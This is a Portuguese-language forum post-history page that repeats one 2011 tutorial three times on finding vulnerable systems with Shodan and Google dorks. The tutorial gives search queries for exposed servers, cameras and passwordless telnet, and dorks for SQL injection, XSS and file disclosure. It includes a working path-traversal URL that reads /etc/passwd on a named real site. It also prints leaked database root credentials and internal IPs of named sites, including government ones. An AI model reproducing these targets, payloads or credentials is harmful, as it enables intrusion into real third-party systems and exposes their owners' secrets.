Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Messages - c0wb0y - Fora da Lei

#1
Defacement / Vulnerabilities Research
18 de May , 2011, 03:30:16 AM
Iaí pessoal do DARKERS, sou novo aqui no forum, minha área é pentest, invasão web e desktop, trago aquia vcs hj um tutorial que eu fiz sobre pesquisa de vulnerabilidades, espero que gostem .

Olá a todos, neste tutorial eu vu mostrar como encontrar varias vulnerabilidades em cms, web , serviços remoto e etc... algumas coisas básicas outras avançadas no entanto tudo é vuln do mesmo jeito . Aqui neste tutorial você vai ter uma ideia de como é faicil invadir sistemas hoje .

Além do Google Hacking Database ( http://www.exploit-db.com/google-dorks/ ) e outros serviços do gênero existem varios outros serviços voltados a pesquisa de vulnerabilidades. Vou começar postando um sistema web only de buscar por vulnerabilidades muito GOOD em especial pra quem gosta de brincar com metasploit, agora vc pode passar o dia todo exploitando empresas e sites comum basta saber pesquisar, bem eu estou falando do ( SHODAN - Computer Search Engine ) www.shodanhq.com desenvolvido por
http://twitter.com/#!/achillean vamos aos exemplos de pesquisa, vc algumas vez ja encontrou um servi rodando o IIS 1.0 pelo google ? quase impossivel né, mais com o SHODAN quase todas os serviços vuln é possivel pesquisar, vejamos alguns exemplos :

http://shodan.surtri.com/?q="iis/1.0"
http://shodan.surtri.com/?q="iis/2.0"
http://shodan.surtri.com/?q="iis/3.0"
http://shodan.surtri.com/?q="iis/4.0"

Veja o resultado vai se surpreender, vamos a outros exemplos .

Aparelhos DVR com interface WEB exposta:
http://shodan.surtri.com/?q=DVR

Máquinas com busybox telnet sem senha:
http://shodan.surtri.com/?q=port%3A23+%22list+of+built-in+commands%22)

Cameras de Segurança abertas na Internet:
http://shodan.surtri.com/?q=port%3A80+%22Camera%22+%22HTTP%2F1.0+200+OK%22

Agora vc pode combinar os novas falhas e 0days que sai em sites de exploits e usar o SHODAN para pesquisar serviços vulneraveis .

Vejam algumas outros exemplos de busca postado em um site voltado a pentest

http://www.pentestit.com/shodan-queries/


Simples WEB-VULNS Research

Encontrando sites vuln a LFD (interessante)

Como são varios sites eu vou por só um exemplo de dork que ja contem varios vuln no google .

d0rk: inurl:download_file.php?file= site:hr
-
demo: www.politologija.hr/download_file.php?file=../../../../../../../../../../../../etc/passwd .


Encontrando arquivos senssíveis (GOOD)

Dorks: allinurl:/conecta_mysql.inc  - intext:db filetype:inc -

http://www.ezsitebuilder.com/php/db.inc

//$host = "db1.actadivina.com";   
//$host = "localhost";
//$db_name = "QS_devil";
//$db_name = "Authors";

http://smlick.net/include/db.inc
http://smlick.net/include/db2.inc

$user = 'root';
$pass = 'orange';
$host = "localhost";
$db_name = 'hanc'

Olha esse aqui, qui legal, pena que pra conectar tem que tar dentro da rede interna deles, se obter acesso a algum site do mesmo servi vc pode conectar .
http://www.pge.mt.gov.br/novosite2/biblioteca/conexao.inc

$db = mysql_connect("192.168.3.80", "root", "cpdpge");

http://gaia.saude.mg.gov.br/conf_pentagrama/conf_site.inc
-
http://www.webfocobrasil.com.br/clientes/schimitt/conecta_mysql.inc
-
http://www.afp.mil.ph/Nolcom/Include/db_connect.inc


Encontrando Falhas de SQL-Injection (interessante)


Muita gente ja fez vídeos, tutoriais com novas dorks e tal, aqui eu vou mostrar somente uma que vale por todas :

inurl:*.php?id=

isso mesmo, dái vc ja pode incrementar mais especificando de qual dóminio vc quer fazer a busca, exemplos; dóminios com.br, gov.br e org e varios outros .

site:gov.br inurl:*.php?id=

Explicação : nesses exemplo, observe que ao invéis de por noticia.php?id= ou pagina.php?id= ou qualquermerda.php?id= eu simplesmente coloco um "*" isso quer dizer que pode vir qualquer coisa .


Encontrando vulnerabilidades de XSS (interessante)

Simplesmente pesquise no google por: inurl:"search.php?q=" - inurl:"search.asp?q=" - inurl:"buscar.php?q="

daí ja da uma noção para novas dorks né ?


  • FROM: Sux | w-rm by c0wb0y - Fora da Lei hehehe by Denis_Blackhat no entanto uso dois nicks :p abraços a todos,falw..  msn c0wb0y-underground@hotmail.com , caso alguma coisa não estiver dentro das regras do forum avisem .
#2
Iaí pessoal do DARKERS, sou novo aqui no forum, minha área é pentest, invasão web e desktop, trago aquia vcs hj um tutorial que eu fiz sobre pesquisa de vulnerabilidades, espero que gostem .

Olá a todos, neste tutorial eu vu mostrar como encontrar varias vulnerabilidades em cms, web , serviços remoto e etc... algumas coisas básicas outras avançadas no entanto tudo é vuln do mesmo jeito . Aqui neste tutorial você vai ter uma ideia de como é faicil invadir sistemas hoje .

Além do Google Hacking Database ( http://www.exploit-db.com/google-dorks/ ) e outros serviços do gênero existem varios outros serviços voltados a pesquisa de vulnerabilidades. Vou começar postando um sistema web only de buscar por vulnerabilidades muito GOOD em especial pra quem gosta de brincar com metasploit, agora vc pode passar o dia todo exploitando empresas e sites comum basta saber pesquisar, bem eu estou falando do ( SHODAN - Computer Search Engine ) www.shodanhq.com desenvolvido por
http://twitter.com/#!/achillean vamos aos exemplos de pesquisa, vc algumas vez ja encontrou um servi rodando o IIS 1.0 pelo google ? quase impossivel né, mais com o SHODAN quase todas os serviços vuln é possivel pesquisar, vejamos alguns exemplos :

http://shodan.surtri.com/?q="iis/1.0"
http://shodan.surtri.com/?q="iis/2.0"
http://shodan.surtri.com/?q="iis/3.0"
http://shodan.surtri.com/?q="iis/4.0"

Veja o resultado vai se surpreender, vamos a outros exemplos .

Aparelhos DVR com interface WEB exposta:
http://shodan.surtri.com/?q=DVR

Máquinas com busybox telnet sem senha:
http://shodan.surtri.com/?q=port%3A23+%22list+of+built-in+commands%22)

Cameras de Segurança abertas na Internet:
http://shodan.surtri.com/?q=port%3A80+%22Camera%22+%22HTTP%2F1.0+200+OK%22

Agora vc pode combinar os novas falhas e 0days que sai em sites de exploits e usar o SHODAN para pesquisar serviços vulneraveis .

Vejam algumas outros exemplos de busca postado em um site voltado a pentest

http://www.pentestit.com/shodan-queries/


Simples WEB-VULNS Research

Encontrando sites vuln a LFD (interessante)

Como são varios sites eu vou por só um exemplo de dork que ja contem varios vuln no google .

d0rk: inurl:download_file.php?file= site:hr
-
demo: www.politologija.hr/download_file.php?file=../../../../../../../../../../../../etc/passwd .


Encontrando arquivos senssíveis (GOOD)

Dorks: allinurl:/conecta_mysql.inc  - intext:db filetype:inc -

http://www.ezsitebuilder.com/php/db.inc

//$host = "db1.actadivina.com";   
//$host = "localhost";
//$db_name = "QS_devil";
//$db_name = "Authors";

http://smlick.net/include/db.inc
http://smlick.net/include/db2.inc

$user = 'root';
$pass = 'orange';
$host = "localhost";
$db_name = 'hanc'

Olha esse aqui, qui legal, pena que pra conectar tem que tar dentro da rede interna deles, se obter acesso a algum site do mesmo servi vc pode conectar .
http://www.pge.mt.gov.br/novosite2/biblioteca/conexao.inc

$db = mysql_connect("192.168.3.80", "root", "cpdpge");

http://gaia.saude.mg.gov.br/conf_pentagrama/conf_site.inc
-
http://www.webfocobrasil.com.br/clientes/schimitt/conecta_mysql.inc
-
http://www.afp.mil.ph/Nolcom/Include/db_connect.inc


Encontrando Falhas de SQL-Injection (interessante)


Muita gente ja fez vídeos, tutoriais com novas dorks e tal, aqui eu vou mostrar somente uma que vale por todas :

inurl:*.php?id=

isso mesmo, dái vc ja pode incrementar mais especificando de qual dóminio vc quer fazer a busca, exemplos; dóminios com.br, gov.br e org e varios outros .

site:gov.br inurl:*.php?id=

Explicação : nesses exemplo, observe que ao invéis de por noticia.php?id= ou pagina.php?id= ou qualquermerda.php?id= eu simplesmente coloco um "*" isso quer dizer que pode vir qualquer coisa .


Encontrando vulnerabilidades de XSS (interessante)

Simplesmente pesquise no google por: inurl:"search.php?q=" - inurl:"search.asp?q=" - inurl:"buscar.php?q="

daí ja da uma noção para novas dorks né ?


  • FROM: Sux | w-rm by c0wb0y - Fora da Lei hehehe by Denis_Blackhat no entanto uso dois nicks :p abraços a todos,falw..  msn c0wb0y-underground@hotmail.com , caso alguma coisa não estiver dentro das regras do forum avisem .
#3
Penetration Tests / Vulnerabilities Research
18 de May , 2011, 03:26:00 AM
Iaí pessoal do DARKERS, sou novo aqui no forum, minha área é pentest, invasão web e desktop, trago aquia vcs hj um tutorial que eu fiz sobre pesquisa de vulnerabilidades, espero que gostem .

Olá a todos, neste tutorial eu vu mostrar como encontrar varias vulnerabilidades em cms, web , serviços remoto e etc... algumas coisas básicas outras avançadas no entanto tudo é vuln do mesmo jeito . Aqui neste tutorial você vai ter uma ideia de como é faicil invadir sistemas hoje .

Além do Google Hacking Database ( http://www.exploit-db.com/google-dorks/ ) e outros serviços do gênero existem varios outros serviços voltados a pesquisa de vulnerabilidades. Vou começar postando um sistema web only de buscar por vulnerabilidades muito GOOD em especial pra quem gosta de brincar com metasploit, agora vc pode passar o dia todo exploitando empresas e sites comum basta saber pesquisar, bem eu estou falando do ( SHODAN - Computer Search Engine ) www.shodanhq.com desenvolvido por
http://twitter.com/#!/achillean vamos aos exemplos de pesquisa, vc algumas vez ja encontrou um servi rodando o IIS 1.0 pelo google ? quase impossivel né, mais com o SHODAN quase todas os serviços vuln é possivel pesquisar, vejamos alguns exemplos :

http://shodan.surtri.com/?q="iis/1.0"
http://shodan.surtri.com/?q="iis/2.0"
http://shodan.surtri.com/?q="iis/3.0"
http://shodan.surtri.com/?q="iis/4.0"

Veja o resultado vai se surpreender, vamos a outros exemplos .

Aparelhos DVR com interface WEB exposta:
http://shodan.surtri.com/?q=DVR

Máquinas com busybox telnet sem senha:
http://shodan.surtri.com/?q=port%3A23+%22list+of+built-in+commands%22)

Cameras de Segurança abertas na Internet:
http://shodan.surtri.com/?q=port%3A80+%22Camera%22+%22HTTP%2F1.0+200+OK%22

Agora vc pode combinar os novas falhas e 0days que sai em sites de exploits e usar o SHODAN para pesquisar serviços vulneraveis .

Vejam algumas outros exemplos de busca postado em um site voltado a pentest

http://www.pentestit.com/shodan-queries/


Simples WEB-VULNS Research

Encontrando sites vuln a LFD (interessante)

Como são varios sites eu vou por só um exemplo de dork que ja contem varios vuln no google .

d0rk: inurl:download_file.php?file= site:hr
-
demo: www.politologija.hr/download_file.php?file=../../../../../../../../../../../../etc/passwd .


Encontrando arquivos senssíveis (GOOD)

Dorks: allinurl:/conecta_mysql.inc  - intext:db filetype:inc -

http://www.ezsitebuilder.com/php/db.inc

//$host = "db1.actadivina.com";   
//$host = "localhost";
//$db_name = "QS_devil";
//$db_name = "Authors";

http://smlick.net/include/db.inc
http://smlick.net/include/db2.inc

$user = 'root';
$pass = 'orange';
$host = "localhost";
$db_name = 'hanc'

Olha esse aqui, qui legal, pena que pra conectar tem que tar dentro da rede interna deles, se obter acesso a algum site do mesmo servi vc pode conectar .
http://www.pge.mt.gov.br/novosite2/biblioteca/conexao.inc

$db = mysql_connect("192.168.3.80", "root", "cpdpge");

http://gaia.saude.mg.gov.br/conf_pentagrama/conf_site.inc
-
http://www.webfocobrasil.com.br/clientes/schimitt/conecta_mysql.inc
-
http://www.afp.mil.ph/Nolcom/Include/db_connect.inc


Encontrando Falhas de SQL-Injection (interessante)


Muita gente ja fez vídeos, tutoriais com novas dorks e tal, aqui eu vou mostrar somente uma que vale por todas :

inurl:*.php?id=

isso mesmo, dái vc ja pode incrementar mais especificando de qual dóminio vc quer fazer a busca, exemplos; dóminios com.br, gov.br e org e varios outros .

site:gov.br inurl:*.php?id=

Explicação : nesses exemplo, observe que ao invéis de por noticia.php?id= ou pagina.php?id= ou qualquermerda.php?id= eu simplesmente coloco um "*" isso quer dizer que pode vir qualquer coisa .


Encontrando vulnerabilidades de XSS (interessante)

Simplesmente pesquise no google por: inurl:"search.php?q=" - inurl:"search.asp?q=" - inurl:"buscar.php?q="

daí ja da uma noção para novas dorks né ?


  • FROM: Sux | w-rm by c0wb0y - Fora da Lei hehehe by Denis_Blackhat no entanto uso dois nicks :p abraços a todos,falw..  msn c0wb0y-underground@hotmail.com , caso alguma coisa não estiver dentro das regras do forum avisem .